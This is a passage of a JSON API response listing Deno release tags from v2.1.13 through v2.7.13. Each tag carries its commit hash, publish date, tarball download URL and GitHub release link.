sitories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"